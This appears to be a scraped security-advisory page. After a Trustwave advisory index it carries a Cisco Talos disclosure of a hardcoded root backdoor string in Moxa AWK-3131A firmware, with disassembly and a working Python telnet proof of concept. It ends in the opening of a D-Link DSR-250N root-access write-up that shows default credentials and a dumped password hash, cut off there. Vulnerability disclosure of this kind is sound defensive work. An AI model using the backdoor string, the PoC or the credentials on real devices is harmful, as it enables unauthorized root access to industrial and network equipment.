D-Link DSL-2875AL and DSL-2877AL devices through 1.00.05 are prone to information disclosure via a simple crafted request to index.asp on the web management server because of username_v and password_v variables.

TWSL2023-005 SQL Injection in Vanderbilt University RedCap Jul 21, 2023 Read | Download TWSL2023-004 Improper input validation in shadow-utils package utility chfn Apr 12, 2023 Read | Download TWSL2023-003 Information Disclosure Vulnerabilities in MoneyLover Feb 07, 2023 Read | Download TWSL2023-002 Input validation Vulnerability in CRUSHFTP Feb 02, 2023 Read | Download TWSL2023-001 Capture-Replay Vulnerability in Sinilink Wifi Remote Thermostat Jan 20, 2023 Read | Download TWSL2022-003 Vulnerabilities in Canon Medical Vitrea View Sep 29, 2022 Read | Download TWSL2022-002 Multiple Vulnerabilities in Oracle Communications Session Border Controller (SBC) Aug 23, 2022 Read | Download TWSL2022-001 Authentication Bypass by Capture-replay in DingTian 2 Channel Relay Board/Relay Card Jul 12, 2022 Read | Download TWSL2021-019 Privilege Escalation in CrypKey License Software Licensing System Nov 04, 2021 Read | Download TWSL2021-018 Authenticated Stored XSS in WordPress Plugin Age Gate Oct 06, 2021 Read | Download TWSL2021-017 Multiple Authenticated Stored XSS in WordPress Plugin Inline Related Posts Oct 06, 2021 Read | Download TWSL2021-016 Stored XSS in WordPress Plugin Timetable and Event Schedule by MotoPress Aug 31, 2021 Read | Download TWSL2021-015 CSRF Vulnerability in WordPress Plugin Comment Link Remove and Other Comment Tools Aug 20, 2021 Read | Download TWSL2021-014 Authenticated SQL Injection in WordPress Plugin WP Simple Booking Calendar Aug 06, 2021 Read | Download TWSL2021-013 Authenticated SQL Injection in WordPress Plugin Stop Bad Bots Aug 06, 2021 Read | Download TWSL2021-012 Vulnerabilities in WordPress Plugin Membership & Content Restriction - Paid Member Subscriptions Aug 06, 2021 Read | Download TWSL2021-011 Privacy Issues in Telegram Self-Destruct Feature on macOS Aug 05, 2021 Read | Download TWSL2021-010 Remote File Access Vulnerability in ON24 ScreenShare Plugin for macOS Jul 21, 2021 Read | Download TWSL2021-009 Persistent Cross-Site Scripting in SolarWinds Serv-U FTP Server Jul 06, 2021 Read | Download TWSL2021-008 Code Execution Vulnerability in Huawei Mobile Broadband HL Service Jun 02, 2021 Read | Download TWSL2021-007 Multiple Vulnerabilities in AURALL REC MONITOR Apr 22, 2021 Read | Download TWSL2021-006 SQLi in WordPress Plugin Simple Membership Apr 05, 2021 Read | Download TWSL2021-005 Privilege Escalation Vulnerability in Umbraco Apr 01, 2021 Read | Download TWSL2021-004 Stored Authenticated XSS in WordPress Plugin Virtual Robots.txt Mar 31, 2021 Read | Download TWSL2021-003 Incorrect SSLv2 rollback protection Vulnerability in OpenSSL Feb 18, 2021 Read | Download TWSL2021-002 Weak ACLs Vulnerability in SolarWinds Serv-U FTP Server 15.2.1 on Windows Feb 03, 2021 Read | Download TWSL2021-001 Multiple Vulnerabilities in SolarWinds Orion Feb 03, 2021 Read | Download TWSL2020-011 Multiple Vulnerabilities in D-Link DSL-2888A Dec 17, 2020 Read | Download TWSL2020-010 Multiple Vulnerabilities in Magic Home Pro Mobile Application Dec 15, 2020 Read | Download TWSL2020-009 Multiple Cleartext Protocol Vulnerabilities in WinZip Dec 10, 2020 Read | Download TWSL2020-008 Lack of Access Control in GO SMS Pro Nov 19, 2020 Read | Download TWSL2020-007 Multiple Vulnerabilities in Modicon M221 controllers and EcoStruxure Machine Expert - Basic Programming Software Nov 12, 2020 Read | Download TWSL2020-006 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Sep 24, 2020 Read | Download TWSL2020-005 Information Disclosure and Denial of Service Vulnerability in IBM Db2 Aug 20, 2020 Read | Download TWSL2020-004 Multiple Vulnerabilities in ASUS RT-AC1900P router Jul 23, 2020 Read | Download TWSL2020-003 Memory information leakage vulnerability in Cisco Webex Meetings Windows Client Jun 18, 2020 Read | Download TWSL2020-002 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Jun 02, 2020 Read | Download TWSL2020-001 Multiple Vulnerabilities in Schneider Electric Products May 07, 2020 Read | Download TWSL2019-010 Multiple Vulnerabilities in SatLink VSAT Modem Units (vmu) Nov 21, 2019 Read | Download TWSL2019-009 Insufficiently Protected Credentials in Shelter Manager ASM 2 Series Oct 25, 2019 Read | Download TWSL2019-008 Vulnerabilities in D-Link Products Sep 10, 2019 Read | Download TWSL2019-007 Vulnerabilities in Comba Products Sep 10, 2019 Read | Download TWSL2019-006 Multiple Vulnerabilities in SanDisk SSD Dashboard Jul 31, 2019 Read | Download TWSL2019-005 Hardcoded credentials in Uniguest Kiosks Jul 11, 2019 Read | Download TWSL2019-004 Expression Injection Vulnerability in Qlik Products Jun 04, 2019 Read | Download TWSL2019-003 Multiple Vulnerabilities in Grandstream Products Mar 21, 2019 Read | Download TWSL2019-002 Vulnerabilities in SolarWinds Database Performance Analyzer Mar 21, 2019 Read | Download TWSL2019-001 OS Command Injection Vulnerabilities in LifeSize Products Feb 07, 2019 Read | Download TWSL2018-012 Kernel Buffer Overflow in IBM Trusteer Rapport Dec 20, 2018 Read | Download TWSL2018-011 Use after free vulnerability in QFX Software KeyScrambler Oct 02, 2018 Read | Download TWSL2018-010 Credential Leak Flaws in Windows PureVPN Client Sep 27, 2018 Read | Download TWSL2018-009 CVE-2018-16962: Webroot SecureAnywhere macOS Kernel Level Memory Corruption Sep 13, 2018 Read | Download TWSL2018-008 CVE-2018-8006 - Cross-Site Scripting (XSS) Vulnerability in Apache ActiveMQ Aug 24, 2018 Read | Download TWSL2018-007 CVE-2018-2892 - Kernel Level Privilege Escalation in Oracle Solaris Jul 24, 2018 Read | Download TWSL2018-006 Unpatched Remote Code Execution in Reprise License Manager Jul 18, 2018 Read | Download TWSL2018-005 Vulnerability in WD My Cloud personal cloud storage Oct 29, 2018 Read | Download TWSL2018-004 Vulnerabilities in NETGEAR Nighthawk X4S router (R7800) Feb 07, 2018 Read | Download TWSL2018-003 Vulnerabilities in NETGEAR R8500 router firmware Feb 07, 2018 Read | Download TWSL2018-002 Vulnerabilities in NETGEAR R8500 router firmware Feb 07, 2018 Read | Download TWSL2018-001 Multiple Vulnerabilities in WD My Cloud personal cloud storage Feb 01, 2018 Read | Download TWSL2017-017 Remote Unauthenticated DoS in Debut embedded httpd server used by Brother printers. Nov 17, 2017 Read | Download TWSL2017-016 Local kernel heap buffer overflow Vulnerability in ESET DESLock+ client application Aug 15, 2017 Read | Download TWSL2017-015 Multiple Vulnerabilities in ManageEngine Applications Manager Aug 09, 2017 Read | Download TWSL2017-013 Multiple Authentication Bypass Vulnerabilities in ManageEngine Applications Manager Jul 26, 2017 Read | Download TWSL2017-012 Remote un-authenticated DoS in IPsec-Tools Racoon Jul 09, 2017 Read | Download TWSL2017-011 Lockscreen Lockout Bypass in Elephone P9000 Android Smartphone Jun 28, 2017 Read | Download TWSL2017-010 Multiple Vulnerabilities in Humax Routers Jun 28, 2017 Read | Download TWSL2017-009 Multiple Vulnerabilities in Avast Antivirus Mar 31, 2017 Read | Download TWSL2017-008 Unauthenticated Privilege Escalation Vulnerability in Serv-U FTP/MFT Server Mar 22, 2017 Read | Download TWSL2017-007 Undocumented Backdoor Account in DBLTek GoIP Mar 02, 2017 Read | Download TWSL2017-006 Multiple Vulnerabilities in Polystar Jupiter Feb 22, 2017 Read | Download TWSL2017-005 Improper Input Validation Vulnerability in SAP Adaptive Server Enterprise Feb 13, 2017 Read | Download TWSL2017-004 Unauthenticated Backdoor Access in Unanet Feb 08, 2017 Read | Download TWSL2017-003 Multiple Vulnerabilities in NETGEAR Routers Jan 30, 2017 Read | Download TWSL2017-002 Multiple Vulnerabilities in McAfee Security Scan Plus Jan 23, 2017 Read | Download TWSL2017-001 Multiple Vulnerabilities in Digitech Systems PaperVision Enterprise Jan 11, 2017 Read | Download TWSL2016-021 Plugin authentication by-pass Vulnerability in Microsoft Skype for Mac OS-X Dec 13, 2016 Read | Download TWSL2016-020 Buffer Overflow Vulnerability in B Labs Bopup Communication Server Nov 03, 2016 Read | Download TWSL2016-019 Multiple XSS Vulnerabilities in Zeuscart Sep 21, 2016 Read | Download TWSL2016-018 Multiple Persistent XSS Vulnerabilities in D-Link DSL-2740E ADSL Router Sep 16, 2016 Read | Download TWSL2016-017 SQL Injection Vulnerability in SAP Adaptive Server Enterprise Sep 16, 2016 Read | Download TWSL2016-016 Multiple Vulnerabilities in Opsview Monitor Pro Sep 01, 2016 Read | Download TWSL2016-015 Password Disclosure Vulnerability in Cisco Connected Streaming Analytics Aug 11, 2016 Read | Download TWSL2016-014 Vulnerabilities in ComfortLink™ II XL850 Aug 11, 2016 Read | Download TWSL2016-013 Unrestricted File Creation vulnerability in SAP Adaptive Server Enterprise Aug 02, 2016 Read | Download TWSL2016-012 Multiple Vulnerabilities in Lenovo Solution Center Jun 23, 2016 Read | Download TWSL2016-011 Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1 Jun 08, 2016 Read | Download TWSL2016-010 Information Disclosure vulnerability in SAP ASE Installer May 26, 2016 Read | Download TWSL2016-009 Privilege Escalation Vulnerability in Lenovo Solution Center May 11, 2016 Read | Download TWSL2016-008 SQL injection vulnerability in SAP ASE May 09, 2016 Read | Download TWSL2016-007 Multiple Vulnerabilities in Cacti Apr 20, 2016 Read | Download TWSL2016-006 Multiple Vulnerabilities in Zen Cart Mar 25, 2016 Read | Download TWSL2016-005 Vulnerabilities in DevArt dotConnect for Oracle Mar 10, 2016 Read | Download TWSL2016-004 Multiple Vulnerabilities in Magnolia CMS Mar 09, 2016 Read | Download TWSL2016-003 Unsafe unlinking of files in Sophos Antivirus Mar 09, 2016 Read | Download TWSL2016-002 Multiple Vulnerabilities in iNovah Feb 18, 2016 Read | Download TWSL2016-001 Multiple Vulnerabilities in Cisco Meraki Jan 13, 2016 Read | Download TWSL2015-024 Multiple Vulnerabilities in Proxmox Mail Gateway Dec 30, 2015 Read | Download TWSL2015-023 Missing authorization check in SAP Adaptive Server Enterprise Dec 09, 2015 Read | Download TWSL2015-022 Cross-Site Scripting in VMware Virtual Center Appliance (vCSA) Web Application Console Nov 17, 2015 Read | Download TWSL2015-021 Joomla SQL Injection Vulnerability Oct 22, 2015 Read | Download TWSL2015-020 Unauthenticated Local File Inclusion Vulnerability in Oracle Open Commerce Platform 3.4 Oct 20, 2015 Read | Download TWSL2015-019 Privilege escalation vulnerability in Oracle Database Oct 20, 2015 Read | Download TWSL2015-018 Service Privilege Elevation in Lenovo System Update 5 Oct 15, 2015 Read | Download TWSL2015-017 Reflected File Download in Red Hat Feedhenry Oct 09, 2015 Read | Download TWSL2015-016 Path Traversal in Oracle GlassFish Server Open Source Edition Aug 27, 2015 Read | Download TWSL2015-015 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Jul 17, 2015 Read | Download TWSL2015-014 Account Probing Vulnerability in Oracle Database Jul 15, 2015 Read | Download TWSL2015-013 Buffer Overflow Vulnerability in Oracle MySQL Jul 15, 2015 Read | Download TWSL2015-012 XSS in Oracle Java Server Faces Jul 15, 2015 Read | Download TWSL2015-011 Vulnerability in the pam\_unix module in Linux-PAM Jun 26, 2015 Read | Download TWSL2015-010 Reflected Cross-site Scripting Vulnerabilities in codeBeamer Jun 09, 2015 Read | Download TWSL2015-009 Request Hijacking Bypass Vulnerability In RubyGems Jun 08, 2015 Read | Download TWSL2015-008 Multiple Vulnerabilities in SAP Adaptive Server Enterprise May 22, 2015 Read | Download TWSL2015-007 Request Hijacking Vulnerability In RubyGems May 18, 2015 Read | Download TWSL2015-006 Multiple Vulnerabilities in QlikView May 13, 2015 Read | Download TWSL2015-005 Blind SQL injection in XpanceNET Apr 24, 2015 Read | Download TWSL2015-004 "Probe" login access vulnerability in SAP ASE Apr 23, 2015 Read | Download TWSL2015-003 Multiple Vulnerabilities in SAP Adaptive Server Enterprise Mar 19, 2015 Read | Download TWSL2015-002 Cross-Site Scripting in Magnolia CMS Feb 12, 2015 Read | Download TWSL2015-001 Multiple Vulnerabilities in IceWarp Mail Server Feb 12, 2015 Read | Download TWSL2014-016 Reflected Cross-Site Scripting Vulnerability in VMware Virtual Center Appliance (vCSA) Web Application Console Dec 05, 2014 Read | Download TWSL2014-015 Cross Site Scripting Vulnerability in Gizmox WebGui Oct 29, 2014 Read | Download TWSL2014-014 Multiple Vulnerabilities in Gerber WebPDM Product Data Management System Oct 24, 2014 Read | Download TWSL2014-013 Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptive Server Enterprise Sep 12, 2014 Read | Download TWSL2014-012 Secure Desktop Protection Bypass in 1Password for Windows Aug 05, 2014 Read | Download TWSL2014-011 Secure Desktop Protection Bypass in Keepass Aug 05, 2014 Read | Download TWSL2014-010 Multiple Vulnerabilities in Wing FTP Server Jul 02, 2014 Read | Download TWSL2014-009 Multiple Vulnerabilities in BSS Company Software Jul 01, 2014 Read | Download TWSL2014-008 Cross Site Scripting Vulnerability in Cisco ASA May 28, 2014 Read | Download TWSL2014-007 Multiple Vulnerabilities in Y-Cam May 01, 2014 Read | Download TWSL2014-006 NetSupport Manager Information Disclosure Vulnerability Apr 17, 2014 Read | Download TWSL2014-005 VPN Privilege Escalation Vulnerability in Cisco ASA Apr 09, 2014 Read | Download TWSL2014-004 Information Disclosure in the BC Collected Information Export Extension for eZ Publish CMS Mar 20, 2014 Read | Download TWSL2014-003 Blind SQL Injection Vulnerability in Tableau Server Jan 24, 2014 Read | Download TWSL2014-002 Buffer Overflow Vulnerability in DaumGame ActiveX Jan 06, 2014 Read | Download TWSL2014-001 Multiple Vulnerabilities in Franklin Fueling's TS-550 evo Jan 03, 2014 Read | Download TWSL2013-034 Path Traversal Vulnerability in WiFi HD Free Nov 20, 2013 Read | Download TWSL2013-033 Multiple Vulnerabilities in Easy File Manager Nov 20, 2013 Read | Download TWSL2013-032 Path Traversal Vulnerability in FTPDrive Nov 20, 2013 Read | Download TWSL2013-031 Information Disclosure Vulnerability in RiskNet Acquirer Nov 07, 2013 Read | Download TWSL2013-030 Multiple Vulnerabilities in Quixplorer Nov 06, 2013 Read | Download TWSL2013-029 Information Disclosure Vulnerability in QNAP Photo Station Sep 27, 2013 Read | Download TWSL2013-028 Persistent Denial of Service Vulnerability in Vino VNC Server Sep 16, 2013 Read | Download TWSL2013-027 Multiple Vulnerabilities in ajaXplorer Sep 05, 2013 Read | Download TWSL2013-026 Multiple Web Application Vulnerabilities in RockMongo Aug 16, 2013 Read | Download TWSL2013-025 Arbitrary File Upload Vulnerability in Official Nmap Aug 02, 2013 Read | Download TWSL2013-024 Cross Site Scripting (XSS) vulnerability in McAfee Superscan 4.0 Aug 02, 2013 Read | Download TWSL2013-023 Lack of Web and API AuthenticationVulnerability in INSTEON Hub Aug 01, 2013 Read | Download TWSL2013-022 No Authentication Vulnerability in Radio Thermostat Aug 01, 2013 Read | Download TWSL2013-021 Multiple Vulnerabilities in Karotz Smart Rabbit Aug 01, 2013 Read | Download TWSL2013-020 Hard-Coded Bluetooth PIN Vulnerability in LIXIL Satis Toilet Aug 01, 2013 Read | Download TWSL2013-018 Multiple Vulnerabilities in OpenEMR Jul 12, 2013 Read | Download TWSL2013-008 Command Injection Vulnerabilities in Linksys Routers. May 31, 2013 Read | Download TWSL2013-007 Multiple Vulnerabilities in VLC Media Player - Web Interface. Jun 10, 2013 Read | Download TWSL2013-006 Cross-Site Scripting Vulnerability in Coldbox. Jun 10, 2013 Read | Download TWSL2013-004 Group Name Enumeration Vulnerability in Cisco IKE Implementation. Apr 18, 2013 Read | Download TWSL2013-002 Multiple XSS Vulnerabilities in The Bug Genie. May 09, 2013 Read | Download TWSL2012-019 Cross-Site Scripting Vulnerability in Support Incident Tracker Aug 29, 2012 Read | Download TWSL2012-016 Multiple Vulnerabilities in Bitweaver Oct 23, 2012 Read | Download TWSL2012-014 Multiple Vulnerabilities in Scrutinizer NetFlow and sFlow Analyzer Jul 27, 2012 Read | Download TWSL2012-012 Cross-Site Scripting Vulnerability in Support Incident Tracker Apr 20, 2012 Read | Download TWSL2012-008 Multiple Vulnerabilities in Scrutinizer NetFlow Apr 10, 2012 Read | Download TWSL2012-005 Cross-Site Scripting Vulnerability in osCommerce Platform Mar 23, 2012 Read | Download TWSL2012-004 Multiple Vulnerabilities in Zen Cart May 03, 2012 Read | Download TWSL2012-003 Cross-Site Scripting Vulnerability in Movable Type Publishing Platform Feb 24, 2012 Read | Download TWSL2012-002 Multiple Vulnerabilities in WordPress Jan 24, 2012 Read | Download TWSL2012-001 Cross-Site Scripting Vulnerability in Textpattern Content Management System Jan 03, 2012 Read | Download TWSL2011-019 Cross-Site Scripting Vulnerability in phpMyAdmin Dec 22, 2011 Read | Download TWSL2011-018 Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface Dec 20, 2011 Read | Download TWSL2011-017 Multiple Vulnerabilities in Merethis Centreon Nov 04, 2011 Read | Download TWSL2011-014 Vulnerability in Pantech Web Browser SSL Implementation Sep 23, 2011 Read | Download TWSL2011-013 Multiple Vulnerabilities in IceWarp Mail Server Sep 23, 2011 Read | Download TWSL2011-008 Focus Stealing Vulnerability in Android Aug 06, 2011 Read | Download TWSL2011-007 iOS SSL Implementation Does Not Validate Certificate Chain Jul 25, 2011 Read | Download TWSL2011-006 IBM Web Application Firewall Bypass Jun 21, 2011 Read | Download TWSL2011-005 Directory Traversal in Trustwave WebDefend Enterprise Jun 17, 2011 Read | Download TWSL2011-004 Cross-Site Scripting Vulnerability in ZyXEL ZyWALL 70 Firewall Jun 10, 2011 Read | Download TWSL2011-003 Vulnerabilities discovered in Avocent Cyclades ACS Web Manager Mar 11, 2011 Read | Download TWSL2011-002 Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) Feb 04, 2011 Read | Download TWSL2011-001 Vulnerabilities in Trustwave WebDefend Enterprise Feb 15, 2011 Read | Download TWSL2010-008 Clear iSpot/Clearspot CSRF Vulnerabilities Dec 10, 2010 Read | Download TWSL2010-007 Passlogix v-GO Self-Service Password Reset Bypass via Invalid SSL Certificate Dec 10, 2010 Read | Download TWSL2010-006 Multiple Vulnerabilities in Camtron CMNC-200 IP Camera Nov 12, 2010 Read | Download TWSL2010-005 FreePBX recordings interface allows remote code execution Sep 23, 2010 Read | Download TWSL2010-003 Unauthorized access to root NFS export on EMC Celerra Network Attached Storage(NAS) appliance Jul 29, 2010 Read | Download TWSL2010-002 Web Service Hijacking in VMWare WebAccess Mar 30, 2010 Read | Download TWSL2010-001 View state tampering vulnerabilities in products from Microsoft, Apache, and Sun Microsystems Feb 03, 2010 Read | Download TWSL2009-002 Cisco's Adaptive Security Appliance (ASA) Web VPN Multiple Vulnerabilities Jun 24, 2009 Read | Download TWSL2009-001 Profense Web Application Firewall and Load Balancer multiple vulnerabilities May 19, 2009 Read | Download

CVE-2019-15656: Security Advisories | Trustwave

An exploitable privilege escalation vulnerability exists in the iw_console functionality of the Moxa AWK-3131A firmware version 1.13. A specially crafted menu selection string can cause an escape from the restricted console, resulting in system access as the root user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.

**Summary**

An exploitable privilege escalation vulnerability exists in the iw\_console functionality of the Moxa AWK-3131A firmware version 1.13. A specially crafted menu selection string can cause an escape from the restricted console, resulting in system access as the root user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.

**Tested Versions**

Moxa AWK-3131A Firmware version 1.13

**Product URLs**

http://www.moxa.com/product/AWK-3131A.htm

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-284: Improper Access Control

**Details**

The Moxa AWK-3131A Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client is a wireless networking appliance intended for use in industrial environments. It is designed to provide wireless communication capabilities to the environments in which it is deployed. Communication with the device is possible using HTTP, Telnet, and SSH.

When a legitimate user uses Telnet or SSH to log into the device they are presented with a restricted shell known as iw\_console. iw\_console allows the user to make various configuration changes, but is not intended to give that user access to the underlying system. When interacting with iw\_console, the user is first presented with a ‘Main Menu’ where they are instructed to enter a character indicating their choice from a list of options, as shown below:

    << Main Menu >>
      (1) System Info Settings
      (2) Network Settings
      (3) Time Settings
      (4) Maintenance
      (5) Restart
      (q) Quit
    
    Key in your selection: 
    

During normal operation if a user types more than one character, or chooses an option that is not listed, iw\_console prints an error message and prompts again for input. If, however, the user enters the specific string “94jo3dkru4 moxaiwroot” then iw\_console will drop the user into a full root shell. When entering the backdoor string it will appear that only the first character has been accepted, however the console continues to read input until a newline is received. This can be seen below:

    << Main Menu >>
      (1) System Info Settings
      (2) Network Settings
      (3) Time Settings
      (4) Maintenance
      (5) Restart
      (q) Quit
    
    Key in your selection: 9~ # whoami
    root
    ~ # 
    

This backdoor appears to have been introduced during a patch following the use of the same values as login credentials as disclosed in TALOS-2016-0231 on firmware version 1.1.

Disassembly for the relevant blocks can be seen below:

    #
    # sub_402628
    #
    ...
    00402970  2444a230   addiu   $a0, $v0, -0x5dd0  {0x41a230, "Key in your selection: "}      # prep prompt message
    00402974  8f82802c   lw      $v0, -0x7fd4($gp)  {conio_writestr}  {0x41a7cc}
    00402978  0040c821   move    $t9, $v0  {conio_writestr}
    0040297c  0411fc92   bal     conio_writestr                                                # call conio_writestr to print the msg to stdout
    00402980  00000000   nop     
    00402984  8fdc0018   lw      $gp, 0x18($fp) {var_70}  {0x4227a0}
    00402988  afc00024   sw      $zero, 0x24($fp) {var_64}  {0x0}
    0040298c  08100a71   j       0x4029c4
    00402990  00000000   nop     
    ...                                                                                        # trimming setup code
    004029f4  00402021   move    $a0, $v0 {var_50}
    004029f8  24050002   addiu   $a1, $zero, 2
    004029fc  00003021   move    $a2, $zero  {0x0}
    00402a00  00003821   move    $a3, $zero  {0x0}
    00402a04  8f828044   lw      $v0, -0x7fbc($gp)  {conio_readstr}  {0x41a7e4}
    00402a08  0040c821   move    $t9, $v0  {conio_readstr}
    00402a0c  0411fb99   bal     conio_readstr                                                 # call to conio_readstr to get the user input
    00402a10  00000000   nop                                                                   # $v0 will be set to '0x63' when the backdoor is used
    ...                                                                                        # trimming checks to make sure there wasn't a failure in conio_readstr
    00402a70  8fc30030   lw      $v1, 0x30($fp) {var_58_1}
    00402a74  24020063   addiu   $v0, $zero, 0x63
    00402a78  14620012   bne     $v1, $v0, 0x402ac4                                            # checking to see if $v0 contains the value '0x63' (c)
    00402a7c  00000000   nop     
    00402a80  8f82803c   lw      $v0, -0x7fc4($gp)  {conio_end}  {0x41a7dc}
    00402a84  0040c821   move    $t9, $v0  {conio_end}
    00402a88  0411f9e9   bal     conio_end
    00402a8c  00000000   nop     
    00402a90  8fdc0018   lw      $gp, 0x18($fp) {var_70}
    00402a94  3c020041   lui     $v0, 0x41
    00402a98  24449484   addiu   $a0, $v0, -0x6b7c  {0x409484, "/bin/sh"}
    00402a9c  8f828098   lw      $v0, -0x7f68($gp)  {iw_system_quiet}
    00402aa0  0040c821   move    $t9, $v0
    00402aa4  0320f809   jalr    $t9                                                           # calls iw_system_quiet with the param '/bin/bash'
    00402aa8  00000000   nop     
    ...
    
    #
    # conio_readstr
    #
    ...
    0040191c  27c20028   addiu   $v0, $fp, 0x28 {var_10}
    00401920  00402021   move    $a0, $v0 {var_10}
    00401924  00002821   move    $a1, $zero  {0x0}
    00401928  0c1005a4   jal     conio_getch                                                   # calls conio_getch which is intended to only read one character
    0040192c  00000000   nop                                                                   # when the backdoor is used it returns the value '0x63'
    00401930  8fdc0010   lw      $gp, 0x10($fp) {var_28}
    00401934  afc20024   sw      $v0, 0x24($fp) {var_14_1}                                     # stores the return value (0x63) into var_14_1
    00401938  8fc30024   lw      $v1, 0x24($fp) {var_14_1}                                     # loads $v1 with var_14_1
    0040193c  24020063   addiu   $v0, $zero, 0x63                                              # loads $v0 with 0x63  
    00401940  14620004   bne     $v1, $v0, 0x401954                                            # checks to see if the $v1 (the return value) is equal to 0x63    
    00401944  00000000   nop                                                                   # continues since it is
    00401948  24020063   addiu   $v0, $zero, 0x63                                              # loads the conio_readstr return value with 0x63 and jumps to the end
    0040194c  081006ec   j       0x401bb0
    00401950  00000000   nop     
    ...
    00401bb0  03c0e821   move    $sp, $fp
    00401bb4  8fbf0034   lw      $ra, 0x34($sp) {__saved_$ra}
    00401bb8  8fbe0030   lw      $fp, 0x30($sp) {__saved_$fp}
    00401bbc  27bd0038   addiu   $sp, $sp, 0x38
    00401bc0  03e00008   jr      $ra                                                           # returns to sub_402628 with return value of 0x63
    00401bc4  00000000   nop     
    ...
    
    #
    # conio_getch
    #
    ...
    004017c0  3c020042   lui     $v0, 0x42
    004017c4  ac40a95c   sw      $zero, -0x56a4($v0)  {0x0}  {data_41a95c}
    004017c8  3c020041   lui     $v0, 0x41
    004017cc  24448340   addiu   $a0, $v0, -0x7cc0  {0x408340, "94jo3dkru4 moxaiwroot"}        # sets the first arg to the backdoor string
    004017d0  3c020042   lui     $v0, 0x42
    004017d4  2445a960   addiu   $a1, $v0, -0x56a0  {0x41a960}                                 # sets the second arg to the user input
    004017d8  8f828078   lw      $v0, -0x7f88($gp)  {strcmp}
    004017dc  0040c821   move    $t9, $v0
    004017e0  0320f809   jalr    $t9                                                           # compares the backdoor string with the user input
    004017e4  00000000   nop     
    004017e8  8fdc0010   lw      $gp, 0x10($fp) {var_18}
    004017ec  1440001a   bne     $v0, $zero, 0x401858                                          # does not jump when the user input is the backdoor string
    004017f0  00000000   nop     
    004017f4  3c020042   lui     $v0, 0x42
    004017f8  2444a960   addiu   $a0, $v0, -0x56a0  {0x41a960}
    004017fc  00002821   move    $a1, $zero  {0x0}
    00401800  24060019   addiu   $a2, $zero, 0x19
    00401804  8f828104   lw      $v0, -0x7efc($gp)  {memset}
    00401808  0040c821   move    $t9, $v0
    0040180c  0320f809   jalr    $t9
    00401810  00000000   nop     
    00401814  8fdc0010   lw      $gp, 0x10($fp) {var_18}  {0x4227a0}
    00401818  24020063   addiu   $v0, $zero, 0x63                                              # sets the conio_getch return value to 0x63
    0040181c  08100617   j       0x40185c
    00401820  00000000   nop     
    ...
    0040185c  03c0e821   move    $sp, $fp
    00401860  8fbf0024   lw      $ra, 0x24($sp) {__saved_$ra}
    00401864  8fbe0020   lw      $fp, 0x20($sp) {__saved_$fp}
    00401868  27bd0028   addiu   $sp, $sp, 0x28
    0040186c  03e00008   jr      $ra                                                           # returns to conio_readstr with the return value of 0x63
    00401870  00000000   nop     
    ...
    

**Exploit Proof of Concept**

    import telnetlib
    import socket
     
    def main():
        # define some required params
        rhost = "192.168.127.253"
        username = "admin"
        password = "moxa"
        payload = "94jo3dkru4 moxaiwroot"
        command = "whoami"
        rport = 4444
    
        # format the params into messages
        usernameMsg = "{}\n".format(username)
        passwordMsg = "{}\n".format(password)
        payloadMsg  = "{}\n".format(payload)
        cmdMsg = "\n telnetd -l{} -p{} \n".format(command, rport)
    
        # interact with the telnet window
        # device name is set and then the device is rebooted
        tn = telnetlib.Telnet(rhost)
        tn.read_until("login: ")
        tn.write(usernameMsg)
        tn.read_until("Password: ")
        tn.write(passwordMsg)
        tn.read_until("selection: ")
        tn.write(payloadMsg)
        tn.read_until("#")
        tn.write(cmdMsg)
    
        # open up a socket and connect to the newly opened telnet port
        # the response should be the output of your command
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((rhost, rport))
        print(s.recv(1024))
        print(s.recv(1024))
        print(s.recv(1024))
        print(s.recv(1024))
        s.close()
     
    if __name__ == '__main__':
        main()
    

**Timeline**

2019-10-22 - Vendor Disclosure  
2020-02-24 - Public Release

Discovered by Jared Rittle and Carl Hurd of Cisco Talos.

CVE-2019-5136: TALOS-2019-0925 || Cisco Talos Intelligence Group

D-Link DSR-250N devices before 1.08B31 allow remote authenticated users to obtain "persistent root access" via the BusyBox CLI, as demonstrated by overwriting the super user password.

    # 
    # Router:                D-Link DSR-250N
    # Hardware Version:      A1
    # Firmware Version:      1.05B73_WW
    # 
    # Arch:                  armv6l, Linux
    # 
    # Author:                0_o -- null_null
    #                        nu11.nu11 [at] yahoo.com
    # Date:                  2012-11-25
    # 
    # Purpose:               Persistently become real root on your D-Link DSR-250N 
    #                        I just wanted to do real firewalling on this 
    #                        cigarette box, but the router software wouldn't
    #                        let me. So it screamed after getting h@kCz0r3d.
    # 
    # Prerequisites:         admin access to CLI
    #
    #
    # Here comes the fun stuff... :-)
    #
    # From the default configuration, you can log in via SSH.
    # user: admin, pass: admin
    # 
    
    root@bt:~# ssh admin@192.168.10.1
    The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
    RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
    admin@192.168.10.1's password: 
    
    
    BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
    Enter 'help' for a list of built-in commands.
    
    ************************************************
        Welcome to DSR-250N Command Line Interface
    ************************************************
    D-Link DSR> 
    
    .exit     Exit this session
    .help     Display an overview of the CLI syntax
    .history  Display the current session's command line history
    .reboot   Reboot the system.
    .top      Return to the default mode
    dot11     [Wireless configuration Mode]
    license   [License configuration Mode]
    net       [Networking configuration mode]
    qos       [QoS configuration Mode]
    security  [Security configuration mode]
    show      Display system components' configuration
    system    [System configuration mode]
    util      [Utilities Mode]
    vpn       [VPN configuration Mode]
    
    D-Link DSR> 
    
    #
    # So you get dropped into the CLI. No shellz :(
    # Let's see what we can do from here...
    #
    
    D-Link DSR> util cat /etc/passwd
    root:!:0:0:root:/root:/bin/sh
    ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh
